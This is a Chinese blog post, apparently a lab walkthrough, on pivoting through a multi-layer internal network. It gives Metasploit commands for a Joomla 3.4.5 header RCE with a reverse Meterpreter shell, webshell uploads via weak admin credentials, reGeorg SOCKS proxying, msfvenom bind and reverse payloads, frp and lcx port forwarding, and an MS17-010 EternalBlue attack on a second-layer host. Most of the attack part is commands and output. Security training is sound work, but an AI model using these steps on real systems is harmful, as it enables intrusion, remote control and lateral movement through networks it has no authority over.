多层代理转发

最新推荐文章于 2024-06-20 20:09:06 发布
最新推荐文章于 2024-06-20 20:09:06 发布
阅读量2.3k 收藏 10
点赞数 2
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luminous_you/article/details/108321127
版权

拓扑图

加粗样式

拿下边界服务器

访问172.16.12.2

信息搜集

  1. wappalyzer

在这里插入图片描述

  1. cms:joolma框架
  2. 端口
root@kali:~# nmap 172.16.12.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 20:57 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 172.16.12.2
Host is up (0.0026s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

攻击

  1. 查询joomla版本信息
search joomla
use auxiliary/scanner/http/joomla_version
set rhosts 172.16.12.2
run
[*] Server: Apache/2.4.6 (CentOS) PHP/5.4.16
[+] Joomla version: 3.4.5
  1. 尝试joomla反序列化漏洞,在msf搜索joomla payload
msf5 > search joomla
msf5 > use exploit/multi/http/joomla_http_header_rce
msf5 > set payload php/meterpreter/reverse_tcp
msf5 > set lhost 172.16.12.179
msf5 > set lport 4444
msf5 > exploit -j -z
msf5 >set rhosts 172.16.12.2
msf5 exploit(multi/http/joomla_http_header_rce) > sessions 1
[*] Starting interaction with 1...

进入session 1 信息搜集

meterpreter > shell
id
uid=48(apache) gid=48(apache) groups=48(apache)
低权限  ---提权---可以利用反弹shell规避防火墙或者安全软件的限制,然后提权,但查询了防火墙状态是关闭的,ssh22端口是开启的,所以下面我是直接登录ssh修改权限的

系统信息
uname -a
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

systeminfo

查ip
ip a

在这里插入图片描述

看防火墙–是关闭的

service firewalld status

在这里插入图片描述
查看结果
在这里插入图片描述

  1. 上传webshell
    ssh登录
ssh root@172.16.12.2
修改权限-----为了上传文件
[root@localhost ~]# cd /var/www
[root@localhost www]# chown -R apache:apache html/

meterpreter > cd /var/www/html
meterpreter > upload /root/Desktop/antsword/2.php

蚁剑连接webshell
4. reGeorg挂代理

蚁剑上传1.php
在这里插入图片描述

本地执行python脚本

root@kali:~# python /root/Desktop/tools/portfwd/reGeorg/reGeorgSocksProxy.py -u http://172.16.12.2/1.php -p 8888
  1. 进一步探测内网其他主机
   添加路由 
   meterpreter > run autoroute -s 10.10.10.0/24 1
  msf5 exploit(multi/http/joomla_http_header_rce) > route

在这里插入图片描述

  1. 使用arp_scanner扫描内网存活主机
msf5 exploit(multi/http/joomla_http_header_rce) > use auxiliary/scanner/discovery/arp_sweep 
msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > run

或者在蚁剑上传ping.sh扫描内网存活主机

bash ping.sh>ping.txt

ping.sh内容

#! /bin/sh

ip='10.10.10'

for i in `seq 1 255`
  do
   {
    ping -c 2 $ip.$i >/dev/null 2>&1
    if [ $? -eq 0 ];then
     echo $ip.$i UP
    else
     echo $ip.$i DOWN
   fi
}&
done
wait
  1. 使用扫描存活主机端口模块,扫描端口
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/portscan/tcp 
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 10.10.10.5
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,3389,22,445,3306
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.10.10.5:           - 10.10.10.5:80 - TCP OPEN
[*] 10.10.10.5:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

第一层内网

1.拿下webshell

浏览器挂代理
在这里插入图片描述
弱口令进后台
http://10.10.10.5/adminbeat/login.asp
在这里插入图片描述

找上传点,找到上传图片的漏洞
在这里插入图片描述

打开burpsuite 配置代理端口
在这里插入图片描述
上传webshell
在这里插入图片描述
选择网站的一张图片复制位置
http://10.10.10.5/images/up_images/202083120115.asp
蚁剑配置代理端口连接10.10.10.5webshell
在这里插入图片描述
2.信息搜集
whomai -------不是system权限,低权限
ip -----------双网卡还有第二层内网
systeminfo---------查看系统信息,windows 补丁状况-使用MS14-058进行提权
在这里插入图片描述
在这里插入图片描述
3.上传msf_bind木马进行远控
分析:
此处使用bind的payload的原因:
我们(攻击机)在外网,访问内网机器----用bind
内网机器回连(主动连接)我们(攻击机)-----reverse
我们挂了代理,可以访问内网机器,但是内网机器不能出网,不能主动回连我们,所以用bind
本地

msf5 exploit(multi/http/joomla_http_header_rce) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.10.10.5
msf5 exploit(multi/handler) > set lport 5555

上传

root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.10.10.5 lport=5555 -f exe -o /root/Desktop/bind.exe

4.使用msf_reverse木马进行远控
分析:
想使用msf_reverse木马进行远控要解决的问题就是让内网机器可以出网
使用端口转发(这里因为防火墙状态处于关闭状态,所以不影响端口转发操作)
10.10.10.5的机器可以访问10.10.10.3
所以将我们(攻击机)4450端口转发到的10.10.10.3的4450端口上
就可以让10.10.10.5访问我们(攻击机)
在这里使用frp工具进行端口转发
frp的客户端和服务端
(想转发那个机器的端口就把客户端放在那个机器上面,客户端的端口转发到服务端的端口)
frpc客户端:攻击机
frps服务端:10.10.10.3
操作:
上传

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > upload /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps
[*] uploading  : /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps -> frps
[*] Uploaded 8.00 MiB of 12.38 MiB (64.65%): /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps -> frps
[*] Uploaded 12.38 MiB of 12.38 MiB (100.0%): /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps -> frps
[*] uploaded   : /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps -> frps
meterpreter > upload /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps.ini
[*] uploading  : /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps.ini -> frps.ini
[*] Uploaded 26.00 B of 26.00 B (100.0%): /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps.ini -> frps.ini
[*] uploaded   : /root/Desktop/tools/portfwd/frp_0.33.0_linux_amd64/frps.ini -> frps.ini

修改权限
meterpreter > chmod 777 frps
meterpreter > chmod 777 frps.ini

这里用蚁剑上传frps时总是500错误,感觉应该是文件太大了
配置
frpc.ini
在这里插入图片描述
frps.ini
7000
运行

10.10.10.3上运行
(apache:/var/www/html) $ ./frps -c frps.ini
本地运行
./frpc -c frpc.ini

在这里插入图片描述

上传msf_reverse 这里的端口要用端口转发使用的端口

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.3 lport=4450 -f exe -o /root/Desktop/rev.exe

在这里插入图片描述
设置二级msf socks 代理
在这里插入图片描述
添加路由
在这里插入图片描述

使用arp_scanner扫描内网存活主机发现10.10.5.105
使用扫描存活主机端口模块,扫描端口
浏览器配置socks5代理
访问10.10.5.105
(和上面一样不赘述了)

第二层

端口转发
上传lcx进行端口转发,10.10.10.5机器的4600端口转到边界机监听10.10.10.3的4450端口上

execute -H -f "C:\www\images\up_images\lcx.exe -tran 4460 10.10.10.3 4450"

攻击
使用 ms17-010 攻击内网机,通过上面转发的端口使其可以出网

msf5 auxiliary(server/socks5) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.5.105
rhosts => 10.10.5.105
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.5.100
lhost => 10.10.5.100
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4460
lport => 4460
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

在这里插入图片描述

luminous_you
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flume之多层代理
zp17834994071的博客
08-18 1221
为什么需要多层代理 当我们用 Flume 采集日志时,由于数据源的多样性,则往往需要配置多个Flume 进行采集,如果只是使用单层 Flume 的话,那么往往会产生很多个文件夹,单个文件夹也只是来自同一个节点的数据组成的。 而实际开发中,为了减少HDFS 的压力,同时提高后续 MR 的处理效率。往往会将同一组多个节点的数据汇聚到同一个文件中,这样同时也较少了数据从生产到分析的时间。 如下图,第一次 agent 负责采集原始数据,第二层 agent 负责对第一层数据进行汇聚。这种多层代理的方式尤其适合 sou
内网穿透之多层代理
weixin_43047908的博客
10-10 2444
目录前言环境搭建ewfrp 前言 平时看大部分文章都是讲的两层网络的穿透,在真实场景下,有时候是三层甚至四层,自己实践之后发现还是和两层网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。 环境搭建 拓扑图如下: 192.168.1.0/24模拟公网环境。 每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。 假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台
FRP内网穿透及多级代理的使用
最新发布
imtech的博客
06-20 1257
今天借着proxifier和一个复杂一点的场景测试一下frp的基础功能和多级代理功能。其实我在某视频网站发过一次视频,由于水平有限没多少播放量,而且时间长了自己都忘了某些细节,所以今天用文字记录一下。下图是测试场景,比如渗透测试过程中黑客利用了S1对外映射的某Web服务的漏洞,通过该漏洞上传了webshell,控制了S1。这时候就想通过其他方式连接该服务器,比如3389端口,或者把S1当成跳板来进行横向渗透S2。这种情况下就可以使用frp最基础的功内网穿透。
利用Frp建立多层代理
ss810540895的博客
05-26 5846
原文 目录 简介 Frp原理 模拟环境 多层网络实战 Frp访问第一层网络 服务端配置 客户端配置 Proxifier连接 Frp访问第二层网络 Frp访问第三层网络 简介 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 frp 主要由 客户端(frpc) 和 服务端(frps) 组成,服务端,客户端通常部署在需要穿透的内网服务所在的机器上。 项目地址:frp · Gi
linux端口多层转发,LINUX端口转发及跳板配置之奇淫异巧
weixin_39868034的博客
05-01 310
一、概述在日常的信息系统维护及信息系统建设的过程中,经常会遇到如下问题:要连接管理的机器由于各种原因限制了直接访问管理,需要经过中间机器作为跳板才能访问。那么如何配置端口转发呢?要连接管理的机器是windows系统,如何通过linux跳板机进行管理?要配置端口转发除了用iptables了,还有没有更简单和更便捷的方法?带着这些问题和疑问,带你进入linux的端口转发和跳板配置之旅。今天要分享的主题...
Frp某场景下实现多层代理
dayouzi的博客
04-19 1199
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
nginx经过多层代理后获取真实来源ip过程详解
01-20
问题 ... #上一层代理IP地址 real_ip_header X-Forwarded-For; real_ip_recursive on; 添加之后启动nginx报错: nginx: [emerg] unknown directive set_real_ip_from in /home/lnidmp/nginx/conf/
nginx做反向代理时的真实IP_nginx反向代理_
10-02
注意,如果还有多层代理,确保所有中间代理都正确设置了`X-Real-IP`,以防止头部被覆盖。 此外,还可以使用`$http_x_forwarded_for`变量,它包含了通过代理链的完整IP列表,最原始的客户端IP位于列表的最前端。但请...
lcx.zip端口转发工具
06-23
4. **代理服务**:LCX可以作为代理服务器使用,将用户请求转发到指定的目标服务器,实现匿名浏览或其他目的。 5. **多端口管理**:对于需要同时管理多个服务或应用的用户,LCX可以方便地将不同端口的请求分别转发到...
Nginx 代理 Apache 下某一个工程
08-25
在IT行业中,构建高效、可扩展的Web服务架构常常涉及到多层代理和负载均衡。这里我们探讨的主题是如何使用Nginx作为代理服务器,代理Apache下的某个特定工程,以实现更优化的流量管理和性能提升。主要涉及的技术栈...
通用架构_代理注册
07-17
1. **代理服务器实现**:代理服务器的代码实现,通常包括接收请求、解析请求、转发请求以及处理响应的功能。 2. **注册中心**:一个集中式的服务,用于存储和管理所有可用的代理服务器信息,如IP地址、端口、类型...
RDP远程访问(远程桌面)的FRPC端设置,配合FRPS服务
11-07
为了确保RDP的安全性,你可以设置多层防护,如: - 使用强密码和双因素认证增强登录安全性。 - 配置防火墙规则,只允许FRPC与FRPS之间的通信。 - 定期更新FRPC和FRPS以获取最新的安全补丁。 在压缩包文件"RDP-...
毒液:毒液-渗透测试仪的多跳代理
02-06
渗透测试人员可以使用毒液轻松地将网络流量代理多层内网,并轻松地管理代理服务器。 此工具仅限于安全研究和教学,用户承担因使用此工具而导致所有法律和相关责任!作者不承担任何法律和相关责任! 特性 可视化...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
正向代理允许内网客户端通过代理服务访问外网资源,而反向代理则让外网请求被转发到内网服务器。内网穿透代理隧道技术正是为了解决这类通信问题,它允许内网节点之间通过隧道间接通信,绕过常规的安全限制。 接...
kbmMW2.61体验下载
02-17
多层架构中,kbmMW扮演着服务代理的角色,负责处理客户端请求,转发到相应的服务器端服务,并将响应返回给客户端。这种设计模式有助于解耦客户端和服务器,使系统更易于维护和扩展。 Delphi7是一款经典的面向对象...
关于iframe跨域使用postMessage的实现
01-21
一是使用nginx代理转发,在域名A的nginx上配置指定的转发规则,直接指向域名B,直接干掉了跨域;另一种方式是使用postMessage方法。此处针对第二种方式,看下使用方式和可能的问题。 postMessage是什么 此处引用MDN...
test信息收集10(多层代理
qq_45300786的博客
01-02 235
多层代理 分别是win7,server2003,linuxme 然后我们现在进入server2003的session 用msf扫描104段ip,128是server2003自己的,129才是新的104段主机 这里我们用新的模块,自动扫描子网,并添加路由 可以看到路由已经添加好了 然后在代理工具里加进去 然后成功访问到, 可以看到先是通过1080(也就是102段),再通过1081(也就是103段)最终访问到104段 然后通过跳板来连接104段机器 这个时候就可以到,我们已经连接上了
红队笔记Day4 -->多层代理(模拟企业拓扑)
huohaowen的博客
02-15 1170
今天来模拟一下企业的真实拓扑,看我怎么打穿它!!!! 内网!!!才是真正的战场!!!!!!!
jdk 可以多层嵌套动态代理
zhenghuangyu的博客
10-29 1240
以前一直以为jdk的动态代理不可以多层嵌套,今天做了一个实验发现是可以的。记录一下 类如下 public interface DemoService { void saiHi(String name); } public class DemoServiceImpl implements DemoService { @Override public void saiHi(...
nginx 多层转发 真实ip
09-02
对于 Nginx 的多层转发,可以通过设置 `X-Forwarded-For` 头字段来获取真实客户端 IP 地址。当 Nginx 作为反向代理服务器时,它会将原始客户端 IP 地址存储在 `X-Forwarded-For` 头字段中,并将自身的 IP 地址添加到该字段的末尾。 要获取真实客户端的 IP 地址,你可以在 Nginx 配置文件中添加以下指令: ```nginx set_real_ip_from <proxy_IP>; # 代理服务器的 IP 地址 real_ip_header X-Forwarded-For; ``` 其中 `<proxy_IP>` 是你的代理服务器的 IP 地址。这样配置后,Nginx 将会从 `X-Forwarded-For` 头字段中获取真实的客户端 IP 地址。 请注意,为了确保安全性,你需要确保只有受信任的代理服务器可以通过设置 `set_real_ip_from` 指令来更改客户端 IP 地址。 希望对你有所帮助!如有更多问题,请继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值